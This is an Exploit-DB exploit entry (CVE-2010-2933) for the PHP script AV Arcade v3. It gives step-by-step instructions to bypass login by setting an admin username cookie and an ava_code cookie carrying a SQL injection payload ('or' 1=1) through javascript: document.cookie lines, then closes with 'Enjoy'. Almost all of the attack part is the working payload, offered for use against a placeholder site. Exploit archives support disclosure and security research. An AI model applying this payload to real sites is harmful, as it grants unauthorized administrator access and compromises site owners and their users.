AV Arcade 3 - Cookie SQL Injection Authentication Bypass

2010-07-28T00:00:00
ID EDB-ID:14494
Type exploitdb
Reporter saudi0hacker
Modified 2010-07-28T00:00:00

Description

AV Arcade v3 Cookie SQL Injection Authentication Bypass. CVE-2010-2933. Webapps exploit for php platform

                                        
                                            :----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login

[2] Apply these Cookie:

    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to main Page:

[4] Enjoy